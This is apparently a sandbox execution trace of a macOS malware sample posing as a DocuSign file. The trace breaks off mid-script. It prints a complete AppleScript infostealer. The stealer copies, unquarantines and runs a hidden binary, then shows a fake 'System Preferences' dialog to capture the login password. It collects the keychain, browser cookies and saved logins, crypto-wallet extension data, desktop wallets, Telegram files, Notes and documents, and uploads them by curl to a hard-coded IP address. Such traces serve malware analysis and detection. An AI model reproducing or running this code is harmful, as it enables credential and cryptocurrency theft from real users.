    PID:512
  - - /usr/libexec/path_helper
      /usr/libexec/path_helper -s
      4⤵
      PID:513
  - - /usr/bin/locale
      locale LC_CTYPE
      4⤵
      PID:514
  - - /Volumes/DocuSignWITWB/DocuSignWITWB.file
      /Volumes/DocuSignWITWB/DocuSignWITWB.file
      4⤵
      PID:516
    - - /bin/bash
        
        bash -c "#!/bin/bash osascript -e 'on run try set volumeList to list disks end try set setupVolume to \"\" try repeat with vol in volumeList if vol contains \"DocuSignWITWB\" then set setupVolume to vol exit repeat end if end repeat end try if setupVolume is \"\" then return end if set scriptDir to \"/Volumes/\" & setupVolume & \"/\" set executableName to \".DocuSignWITWB\" set executablePath to scriptDir & executableName set tmpExecutablePath to \"/tmp/\" & executableName try do shell script \"rm -f \" & quoted form of tmpExecutablePath end try try do shell script \"cp \" & quoted form of executablePath & \" \" & quoted form of tmpExecutablePath end try try do shell script \"xattr -c \" & quoted form of tmpExecutablePath end try try do shell script \"chmod +x \" & quoted form of tmpExecutablePath end try try do shell script quoted form of tmpExecutablePath end try end run'"
        5⤵
        
        PID:520
    - - /usr/bin/osascript
        
        osascript -e "on run try set volumeList to list disks end try set setupVolume to \"\" try repeat with vol in volumeList if vol contains \"DocuSignWITWB\" then set setupVolume to vol exit repeat end if end repeat end try if setupVolume is \"\" then return end if set scriptDir to \"/Volumes/\" & setupVolume & \"/\" set executableName to \".DocuSignWITWB\" set executablePath to scriptDir & executableName set tmpExecutablePath to \"/tmp/\" & executableName try do shell script \"rm -f \" & quoted form of tmpExecutablePath end try try do shell script \"cp \" & quoted form of executablePath & \" \" & quoted form of tmpExecutablePath end try try do shell script \"xattr -c \" & quoted form of tmpExecutablePath end try try do shell script \"chmod +x \" & quoted form of tmpExecutablePath end try try do shell script quoted form of tmpExecutablePath end try end run"
        5⤵
        
        PID:520

/usr/libexec/xpcproxy
xpcproxy com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:515

/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:515

/usr/bin/base64
base64 -D
1⤵
PID:519

/bin/sh
sh -c "rm -f '/tmp/.DocuSignWITWB'"
1⤵
PID:521

/bin/bash
sh -c "rm -f '/tmp/.DocuSignWITWB'"
1⤵
PID:521

/bin/rm
rm -f /tmp/.DocuSignWITWB
1⤵
PID:521

/bin/sh
sh -c "cp '/Volumes/DocuSignWITWB/.DocuSignWITWB' '/tmp/.DocuSignWITWB'"
1⤵
PID:522

/bin/bash
sh -c "cp '/Volumes/DocuSignWITWB/.DocuSignWITWB' '/tmp/.DocuSignWITWB'"
1⤵
PID:522

/bin/cp
cp /Volumes/DocuSignWITWB/.DocuSignWITWB /tmp/.DocuSignWITWB
1⤵
PID:522

/bin/sh
sh -c "xattr -c '/tmp/.DocuSignWITWB'"
1⤵
PID:523

/bin/bash
sh -c "xattr -c '/tmp/.DocuSignWITWB'"
1⤵
PID:523

/usr/bin/xattr
xattr -c /tmp/.DocuSignWITWB
1⤵
PID:523

/bin/sh
sh -c "chmod +x '/tmp/.DocuSignWITWB'"
1⤵
PID:524

/bin/bash
sh -c "chmod +x '/tmp/.DocuSignWITWB'"
1⤵
PID:524

/bin/chmod
chmod +x /tmp/.DocuSignWITWB
1⤵
PID:524

/bin/sh
sh -c "'/tmp/.DocuSignWITWB'"
1⤵
PID:525

/bin/bash
sh -c "'/tmp/.DocuSignWITWB'"
1⤵
PID:525

/tmp/.DocuSignWITWB
/tmp/.DocuSignWITWB
1⤵
PID:525

/bin/sh
sh -c "disown; pkill Terminal"
1⤵
PID:526

/bin/bash
sh -c "disown; pkill Terminal"
1⤵
PID:526
- /usr/bin/pkill
  pkill Terminal
  2⤵
  PID:527

/bin/sh
sh -c "osascript -e 'set release to true set filegrabbers to true if release then try tell window 1 of application \"Terminal\" to set visible to false end try end if on filesizer(paths) set fsz to 0 try set theItem to quoted form of POSIX path of paths set fsz to (do shell script \"/usr/bin/mdls -name kMDItemFSSize -raw \" & theItem) end try return fsz end filesizer on mkdir(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) do shell script \"mkdir -p \" & filePosixPath end try end mkdir on FileName(filePath) try set reversedPath to (reverse of every character of filePath) as string set trimmedPath to text 1 thru ((offset of \"/\" in reversedPath) - 1) of reversedPath set finalPath to (reverse of every character of trimmedPath) as string return finalPath end try end FileName on BeforeFileName(filePath) try set lastSlash to offset of \"/\" in (reverse of every character of filePath) as string set trimmedPath to text 1 thru -(lastSlash + 1) of filePath return trimmedPath end try end BeforeFileName on writeText(textToWrite, filePath) try set folderPath to BeforeFileName(filePath) mkdir(folderPath) set fileRef to (open for access filePath with write permission) write textToWrite to fileRef starting at eof close access fileRef end try end writeText on readwrite(path_to_file, path_as_save) try set fileContent to read path_to_file set folderPath to BeforeFileName(path_as_save) mkdir(folderPath) do shell script \"cat \" & quoted form of path_to_file & \" > \" & quoted form of path_as_save end try end readwrite on readwrite2(path_to_file, path_as_save) try set folderPath to do shell script \"dirname \" & quoted form of path_as_save mkdir(folderPath) tell application \"Finder\" set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacing end tell end try end readwrite2 on isDirectory(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) set fileType to (do shell script \"file -b \" & filePosixPath) if fileType ends with \"directory\" then return true end if return false end try end isDirectory on GrabFolderLimit(sourceFolder, destinationFolder) try set bankSize to 0 set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolderLimit(itemPath, savePath) else set fsz to filesizer(itemPath) set bankSize to bankSize + fsz if bankSize < 10 * 1024 * 1024 then readwrite(itemPath, savePath) end if end if end if end repeat end try end GrabFolderLimit on GrabFolder(sourceFolder, destinationFolder) try set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\", \"dumps\", \"emoji\", \"user_data\", \"__update__\", \"user_data#2\", \"user_data#3\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolder(itemPath, savePath) else readwrite(itemPath, savePath) end if end if end repeat end try end GrabFolder on parseFF(firefox, writemind) try set myFiles to {\"/cookies.sqlite\", \"/formhistory.sqlite\", \"/key4.db\", \"/logins.json\"} set fileList to list folder firefox without invisibles repeat with currentItem in fileList set fpath to writemind & \"ff/\" & currentItem set readpath to firefox & currentItem repeat with FFile in myFiles readwrite(readpath & FFile, fpath & FFile) end repeat end repeat end try end parseFF on checkvalid(username, password_entered) try set result to do shell script \"dscl . authonly \" & quoted form of username & space & quoted form of password_entered if result is not equal to \"\" then return false else return true end if on error return false end try end checkvalid on getpwd(username, writemind) try if checkvalid(username, \"\") then set result to do shell script \"security 2>&1 > /dev/null find-generic-password -ga \\\"Chrome\\\" | awk \\\"{print \$2}\\\"\" writeText(result as string, writemind & \"masterpass-chrome\") else repeat set result to display dialog \"Required Application Helper.\\nPlease enter password for continue.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"System Preferences\" with hidden answer set password_entered to text returned of result if checkvalid(username, password_entered) then writeText(password_entered, writemind & \"pwd\") return password_entered end if end repeat end if end try return \"\" end getpwd on grabPlugins(paths, savePath, pluginList, index) try set fileList to list folder paths without invisibles repeat with PFile in fileList repeat with Plugin in pluginList if (PFile contains Plugin) then set newpath to paths & PFile set newsavepath to savePath & \"/\" & Plugin if index then set newsavepath to newsavepath & \"/IndexedDB/\" end if GrabFolder(newpath, newsavepath) end if end repeat end repeat end try end grabPlugins on chromium(writemind, chromium_map) set pluginList to {\"keenhcnmdmjjhincpilijphpiohdppno\", \"hbbgbephgojikajhfbomhlmmollphcad\", \"cjmkndjhnagcfbpiemnkdpomccnjblmj\", \"dhgnlgphgchebgoemcjekedjjbifijid\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"kamfleanhcmjelnhaeljonilnmjpkcjc\", \"jnldfbidonfeldmalbflbmlebbipcnle\", \"fdcnegogpncmfejlfnffnofpngdiejii\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\", \"pdadjkfkgcafgbceimcpbkalnfnepbnk\", \"kjjebdkfeagdoogagbhepmbimaphnfln\", \"ldinpeekobnhjjdofggfgjlcehhmanlj\", \"dkdedlpgdmmkkfjabffeganieamfklkm\", \"bcopgchhojmggmffilplmbdicgaihlkp\", \"kpfchfdkjhcoekhdldggegebfakaaiog\", \"idnnbdplmphpflfnlkomgpfbpcgelopg\", \"mlhakagmgkmonhdonhkpjeebfphligng\", \"bipdhagncpgaccgdbddmbpcabgjikfkn\", \"gcbjmdjijjpffkpbgdkaojpmaninaion\", \"nhnkbkgjikgcigadomkphalanndcapjk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"hoighigmnhgkkdaenafgnefkcmipfjon\", \"klghhnkeealcohjjanjjdaeeggmfmlpl\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"ebfidpplhabeedpnhjnobghokpiioolj\", \"emeeapjkbcbpbpgaagfchmcgglmebnen\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"fhilaheimglignddkjgofkcbgekhenbh\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"cihmoadaighcejopammfbmddcmdekcje\", \"lodccjjbdhfakaekdiahmedfbieldgik\", \"omaabbefbmiijedngplfjmnooppbclkk\", \"cjelfplplebdjjenllpjcblmjkfcffne\", \"jnlgamecbpmbajjfhmmmlhejkemejdma\", \"fpkhgmpbidmiogeglndfbkegfdlnajnf\", \"bifidjkcdpgfnlbcjpdkdcnbiooooblg\", \"amkmjjmmflddogmhpjloimipbofnfjih\", \"flpiciilemghbmfalicajoolhkkenfel\", \"hcflpincpppdclinealmandijcmnkbgn\", \"aeachknmefphepccionboohckonoeemg\", \"nlobpakggmbcgdbpjpnagmdbdhdhgphk\", \"momakdpclmaphlamgjcndbgfckjfpemp\", \"mnfifefkajgofkcjkemidiaecocnkjeh\", \"fnnegphlobjdpkhecapkijjdkgcjhkib\", \"ehjiblpccbknkgimiflboggcffmpphhp\", \"ilhaljfiglknggcoegeknjghdgampffk\", \"pgiaagfkgcbnmiiolekcfmljdagdhlcm\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"imlcamfeniaidioeflifonfjeeppblda\", \"mdjmfdffdcmnoblignmgpommbefadffd\", \"ooiepdgjjnhcmlaobfinbomgebfgablh\", \"pcndjhkinnkaohffealmlmhaepkpmgkb\", \"ppdadbejkmjnefldpcdjhnkpbjkikoip\", \"cgeeodpfagjceefieflmdfphplkenlfk\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"bocpokimicclpaiekenaeelehdjllofo\", \"pocmplpaccanhmnllbbkpgfliimjljgo\", \"cphhlgmgameodnhkjdmkpanlelnlohao\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"bopcbmipnjdcdfflfgjdgdjejmgpoaab\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"phkbamefinggmakgklpkljjmgibohnba\", \"epapihdplajcdnnkdeiahlgigofloibg\", \"hpclkefagolihohboafpheddmmgdffjm\", \"cjookpbkjnpkmknedggeecikaponcalb\", \"cpmkedoipcpimgecpmgpldfpohjplkpp\", \"modjfdjcodmehnpccdjngmdfajggaoeh\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"kncchdigobghenbbaddojjnnaogfppfj\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"mcbigmjiafegjnnogedioegffbooigli\", \"fccgmnglbhajioalokbcidhcaikhlcpm\", \"hnhobjmcibchnmglfbldbfabcgaknlkj\", \"apnehcjmnengpnmccpaibjmhhoadaico\", \"enabgbdfcbaehmbigakijjabdpdnimlg\", \"mgffkfbidihjpoaomajlbgchddlicgpn\", \"fopmedgnkfpebgllppeddmmochcookhc\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\", \"ammjlinfekkoockogfhdkgcohjlbhmff\", \"abkahkcbhngaebpcgfmhkoioedceoigp\", \"dcbjpgbkjoomeenajdabiicabjljlnfp\", \"gkeelndblnomfmjnophbhfhcjbcnemka\", \"pnndplcbkakcplkjnolgbkdgjikjednm\", \"copjnifcecdedocejpaapepagaodgpbh\", \"hgbeiipamcgbdjhfflifkgehomnmglgk\", \"mkchoaaiifodcflmbaphdgeidocajadp\", \"ellkdbaphhldpeajbepobaecooaoafpg\", \"mdnaglckomeedfbogeajfajofmfgpoae\", \"nknhiehlklippafakaeklbeglecifhad\", \"ckklhkaabbmdjkahiaaplikpdddkenic\", \"fmblappgoiilbgafhjklehhfifbdocee\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"cnmamaachppnkjgnildpdmkaakejnhae\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\", \"niiaamnmgebpeejeemoifgdndgeaekhe\", \"odpnjmimokcmjgojhnhfcnalnegdjmdn\", \"lbjapbcmmceacocpimbpbidpgmlmoaao\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"hpglfhgfnhbgpjdenjgmdgoeiappafln\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"ibljocddagjghmlpgihahamcghfggcjc\", \"gkodhkbmiflnmkipcmlhhgadebbeijhh\", \"dbgnhckhnppddckangcjbkjnlddbjkna\", \"mfhbebgoclkghebffdldpobeajmbecfk\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"agoakfejjabomempkjlepdflaleeobhb\", \"dgiehkgfknklegdhekgeabnhgfjhbajd\", \"onhogfjeacnfoofkfgppdlbmlmnplgbn\", \"kkpehldckknjffeakihjajcjccmcjflh\", \"jaooiolkmfcmloonphpiiogkfckgciom\", \"ojggmchlghnjlapmfbnjholfjkiidbch\", \"pmmnimefaichbcnbndcfpaagbepnjaig\", \"oiohdnannmknmdlddkdejbmplhbdcbee\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"anokgmphncpekkhclmingpimjmcooifb\", \"kkpllkodjeloidieedojogacfhpaihoh\", \"iokeahhehimjnekafflcihljlcjccdbe\", \"ifckdpamphokdglkkdomedpdegcjhjdp\", \"loinekcabhlmhjjbocijdoimmejangoa\", \"fcfcfllfndlomdhbehjjcoimbgofdncg\", \"ifclboecfhkjbpmhgehodcjpciihhmif\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"ookjlbkiijinhpmnjffcofjonbfbgaoc\", \"oafedfoadhdjjcipmcbecikgokpaphjk\", \"mapbhaebnddapnmifbbkgeedkeplgjmf\", \"cmndjbecilbocjfkibfbifhngkdmjgog\", \"kpfopkelmapcoipemfendmdcghnegimn\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\", \"opcgpfmipidbgpenhmajoajpbobppdil\", \"lakggbcodlaclcbbbepmkpdhbcomcgkd\", \"kgdijkcfiglijhaglibaidbipiejjfdp\", \"hdkobeeifhdplocklknbnejdelgagbao\", \"lnnnmfcpbkafcpgdilckhmhbkkbpkmid\", \"nbdhibgjnjpnkajaghbffjbkcgljfgdi\", \"kmhcihpebfmpgmihbkipmjlmmioameka\", \"kmphdnilpmdejikjdnlbcnmnabepfgkh\", \"nngceckbapebfimnlniiiahkandclblb\"} set chromiumFiles to {\"/Network/Cookies\", \"/Cookies\", \"/Web Data\", \"/Login Data\", \"/Local Extension Settings/\", \"/IndexedDB/\"} repeat with chromium in chromium_map set savePath to writemind & \"Chromium/\" & item 1 of chromium & \"_\" try set fileList to list folder item 2 of chromium without invisibles repeat with currentItem in fileList if ((currentItem as string) is equal to \"Default\") or ((currentItem as string) contains \"Profile\") then repeat with CFile in chromiumFiles set readpath to (item 2 of chromium & currentItem & CFile) if ((CFile as string) is equal to \"/Network/Cookies\") then set CFile to \"/Cookies\" end if if ((CFile as string) is equal to \"/Local Extension Settings/\") then grabPlugins(readpath, savePath & currentItem, pluginList, false) else if (CFile as string) is equal to \"/IndexedDB/\" then grabPlugins(readpath, savePath & currentItem, pluginList, true) else set writepath to savePath & currentItem & CFile readwrite(readpath, writepath) end if end repeat end if end repeat end try end repeat end chromium on telegram(writemind, library) try GrabFolder(library & \"Telegram Desktop/tdata/\", writemind & \"Telegram Data/\") end try end telegram on deskwallets(writemind, deskwals) repeat with deskwal in deskwals try GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal) end try end repeat end deskwallets on filegrabber(writemind) try set destinationFolderPath to POSIX file (writemind & \"FileGrabber/\") mkdir(destinationFolderPath) set photosPath to POSIX file (writemind & \"FileGrabber/NotesFiles/\") mkdir(photosPath) set extensionsList to {\"txt\", \"pdf\", \"docx\", \"wallet\", \"key\", \"keys\", \"doc\"} set bankSize to 0 tell application \"Finder\" try set safariFolderPath to (path to home folder as text) & \"Library:Cookies:\" duplicate file (safariFolderPath & \"Cookies.binarycookies\") to folder destinationFolderPath with replacing set name of result to \"saf1\" end try try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" set notesAccounts to folder (notesFolderPath & \"Accounts:LocalAccount:Media\") duplicate notesAccounts to photosPath with replacing duplicate notesAccounts to POSIX file photosPath as alias with replacing set notesFolder to folder notesFolderPath set notesFiles to {\"NoteStore.sqlite\", \"NoteStore.sqlite-shm\", \"NoteStore.sqlite-wal\"} repeat with fileName in notesFiles set sourceFile to file fileName of notesFolder duplicate sourceFile to POSIX file destinationFolderPath as alias with replacing end repeat end try try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set downloadsFiles to every file of folder \"Downloads\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set filesize to size of aFile if filesize < 3 * 1024 * 1024 then if (bankSize + filesize) < 30 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + filesize end try else exit repeat end if end if end if end repeat end try end tell end try end filegrabber on send_data(attempt) try set result_send to (do shell script \"curl -X POST -H \\\"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\\\" -H \\\"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\\\" -H \\\"cl: 0\\\" -H \\\"cn: 0\\\" --max-time 300 -retry 5 -retry-delay 10 -F \\\"file=@/tmp/out.zip\\\" http://141.98.9.20/joinsystem\") on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end try end send_data set username to (system attribute \"USER\") set profile to \"/Users/\" & username set randomNumber to do shell script \"echo \$((RANDOM % 9000 + 1000))\" set writemind to \"/tmp/\" & randomNumber & \"/\" try set result to (do shell script \"system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType\") writeText(result, writemind & \"info\") end try set library to profile & \"/Library/Application Support/\" set password_entered to getpwd(username, writemind) delay 0.01 set chromiumMap to {{\"Chrome\", library & \"Google/Chrome/\"}, {\"Brave\", library & \"BraveSoftware/Brave-Browser/\"}, {\"Edge\", library & \"Microsoft Edge/\"}, {\"Vivaldi\", library & \"Vivaldi/\"}, {\"Opera\", library & \"com.operasoftware.Opera/\"}, {\"OperaGX\", library & \"com.operasoftware.OperaGX/\"}, {\"Chrome Beta\", library & \"Google/Chrome Beta/\"}, {\"Chrome Canary\", library & \"Google/Chrome Canary\"}, {\"Chromium\", library & \"Chromium/\"}, {\"Chrome Dev\", library & \"Google/Chrome Dev/\"}, {\"Arc\", library & \"Arc/\"}, {\"Coccoc\", library & \"Coccoc/\"}} set walletMap to {{\"deskwallets/Electrum\", profile & \"/.electrum/wallets/\"}, {\"deskwallets/Coinomi\", library & \"Coinomi/wallets/\"}, {\"deskwallets/Exodus\", library & \"Exodus/\"}, {\"deskwallets/Atomic\", library & \"atomic/Local Storage/leveldb/\"}, {\"deskwallets/Wasabi\", profile & \"/.walletwasabi/client/Wallets/\"}, {\"deskwallets/Ledger_Live\", library & \"Ledger Live/\"}, {\"deskwallets/Monero\", profile & \"/Monero/wallets/\"}, {\"deskwallets/Bitcoin_Core\", library & \"Bitcoin/wallets/\"}, {\"deskwallets/Litecoin_Core\", library & \"Litecoin/wallets/\"}, {\"deskwallets/Dash_Core\", library & \"DashCore/wallets/\"}, {\"deskwallets/Electrum_LTC\", profile & \"/.electrum-ltc/wallets/\"}, {\"deskwallets/Electron_Cash\", profile & \"/.electron-cash/wallets/\"}, {\"deskwallets/Guarda\", library & \"Guarda/\"}, {\"deskwallets/Dogecoin_Core\", library & \"Dogecoin/wallets/\"}, {\"deskwallets/Trezor_Suite\", library & \"@trezor/suite-desktop/\"}} readwrite(library & \"Binance/app-store.json\", writemind & \"deskwallets/Binance/app-store.json\") readwrite(library & \"@tonkeeper/desktop/config.json\", \"deskwallets/TonKeeper/config.json\") readwrite(profile & \"/Library/Keychains/login.keychain-db\", writemind & \"keychain\") if release then readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\", writemind & \"FileGrabber/NoteStore.sqlite\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal\", writemind & \"FileGrabber/NoteStore.sqlite-wal\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm\", writemind & \"FileGrabber/NoteStore.sqlite-shm\") readwrite2(profile & \"/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/Cookies.binarycookies\") readwrite(profile & \"/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/saf1\") end if if filegrabbers then filegrabber(writemind) end if writeText(username, writemind & \"username\") set ff_paths to {library & \"Firefox/Profiles/\", library & \"Waterfox/Profiles/\", library & \"Pale Moon/Profiles/\"} repeat with firefox in ff_paths try parseFF(firefox, writemind) end try end repeat chromium(writemind, chromiumMap) deskwallets(writemind, walletMap) telegram(writemind, library) do shell script \"ditto -c -k --sequesterRsrc \" & writemind & \" /tmp/out.zip\" send_data(0) do shell script \"rm -r \" & writemind do shell script \"rm /tmp/out.zip\" '&"
1⤵
PID:528

/bin/bash
sh -c "osascript -e 'set release to true set filegrabbers to true if release then try tell window 1 of application \"Terminal\" to set visible to false end try end if on filesizer(paths) set fsz to 0 try set theItem to quoted form of POSIX path of paths set fsz to (do shell script \"/usr/bin/mdls -name kMDItemFSSize -raw \" & theItem) end try return fsz end filesizer on mkdir(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) do shell script \"mkdir -p \" & filePosixPath end try end mkdir on FileName(filePath) try set reversedPath to (reverse of every character of filePath) as string set trimmedPath to text 1 thru ((offset of \"/\" in reversedPath) - 1) of reversedPath set finalPath to (reverse of every character of trimmedPath) as string return finalPath end try end FileName on BeforeFileName(filePath) try set lastSlash to offset of \"/\" in (reverse of every character of filePath) as string set trimmedPath to text 1 thru -(lastSlash + 1) of filePath return trimmedPath end try end BeforeFileName on writeText(textToWrite, filePath) try set folderPath to BeforeFileName(filePath) mkdir(folderPath) set fileRef to (open for access filePath with write permission) write textToWrite to fileRef starting at eof close access fileRef end try end writeText on readwrite(path_to_file, path_as_save) try set fileContent to read path_to_file set folderPath to BeforeFileName(path_as_save) mkdir(folderPath) do shell script \"cat \" & quoted form of path_to_file & \" > \" & quoted form of path_as_save end try end readwrite on readwrite2(path_to_file, path_as_save) try set folderPath to do shell script \"dirname \" & quoted form of path_as_save mkdir(folderPath) tell application \"Finder\" set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacing end tell end try end readwrite2 on isDirectory(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) set fileType to (do shell script \"file -b \" & filePosixPath) if fileType ends with \"directory\" then return true end if return false end try end isDirectory on GrabFolderLimit(sourceFolder, destinationFolder) try set bankSize to 0 set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolderLimit(itemPath, savePath) else set fsz to filesizer(itemPath) set bankSize to bankSize + fsz if bankSize < 10 * 1024 * 1024 then readwrite(itemPath, savePath) end if end if end if end repeat end try end GrabFolderLimit on GrabFolder(sourceFolder, destinationFolder) try set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\", \"dumps\", \"emoji\", \"user_data\", \"__update__\", \"user_data#2\", \"user_data#3\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolder(itemPath, savePath) else readwrite(itemPath, savePath) end if end if end repeat end try end GrabFolder on parseFF(firefox, writemind) try set myFiles to {\"/cookies.sqlite\", \"/formhistory.sqlite\", \"/key4.db\", \"/logins.json\"} set fileList to list folder firefox without invisibles repeat with currentItem in fileList set fpath to writemind & \"ff/\" & currentItem set readpath to firefox & currentItem repeat with FFile in myFiles readwrite(readpath & FFile, fpath & FFile) end repeat end repeat end try end parseFF on checkvalid(username, password_entered) try set result to do shell script \"dscl . authonly \" & quoted form of username & space & quoted form of password_entered if result is not equal to \"\" then return false else return true end if on error return false end try end checkvalid on getpwd(username, writemind) try if checkvalid(username, \"\") then set result to do shell script \"security 2>&1 > /dev/null find-generic-password -ga \\\"Chrome\\\" | awk \\\"{print \$2}\\\"\" writeText(result as string, writemind & \"masterpass-chrome\") else repeat set result to display dialog \"Required Application Helper.\\nPlease enter password for continue.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"System Preferences\" with hidden answer set password_entered to text returned of result if checkvalid(username, password_entered) then writeText(password_entered, writemind & \"pwd\") return password_entered end if end repeat end if end try return \"\" end getpwd on grabPlugins(paths, savePath, pluginList, index) try set fileList to list folder paths without invisibles repeat with PFile in fileList repeat with Plugin in pluginList if (PFile contains Plugin) then set newpath to paths & PFile set newsavepath to savePath & \"/\" & Plugin if index then set newsavepath to newsavepath & \"/IndexedDB/\" end if GrabFolder(newpath, newsavepath) end if end repeat end repeat end try end grabPlugins on chromium(writemind, chromium_map) set pluginList to {\"keenhcnmdmjjhincpilijphpiohdppno\", \"hbbgbephgojikajhfbomhlmmollphcad\", \"cjmkndjhnagcfbpiemnkdpomccnjblmj\", \"dhgnlgphgchebgoemcjekedjjbifijid\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"kamfleanhcmjelnhaeljonilnmjpkcjc\", \"jnldfbidonfeldmalbflbmlebbipcnle\", \"fdcnegogpncmfejlfnffnofpngdiejii\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\", \"pdadjkfkgcafgbceimcpbkalnfnepbnk\", \"kjjebdkfeagdoogagbhepmbimaphnfln\", \"ldinpeekobnhjjdofggfgjlcehhmanlj\", \"dkdedlpgdmmkkfjabffeganieamfklkm\", \"bcopgchhojmggmffilplmbdicgaihlkp\", \"kpfchfdkjhcoekhdldggegebfakaaiog\", \"idnnbdplmphpflfnlkomgpfbpcgelopg\", \"mlhakagmgkmonhdonhkpjeebfphligng\", \"bipdhagncpgaccgdbddmbpcabgjikfkn\", \"gcbjmdjijjpffkpbgdkaojpmaninaion\", \"nhnkbkgjikgcigadomkphalanndcapjk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"hoighigmnhgkkdaenafgnefkcmipfjon\", \"klghhnkeealcohjjanjjdaeeggmfmlpl\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"ebfidpplhabeedpnhjnobghokpiioolj\", \"emeeapjkbcbpbpgaagfchmcgglmebnen\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"fhilaheimglignddkjgofkcbgekhenbh\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"cihmoadaighcejopammfbmddcmdekcje\", \"lodccjjbdhfakaekdiahmedfbieldgik\", 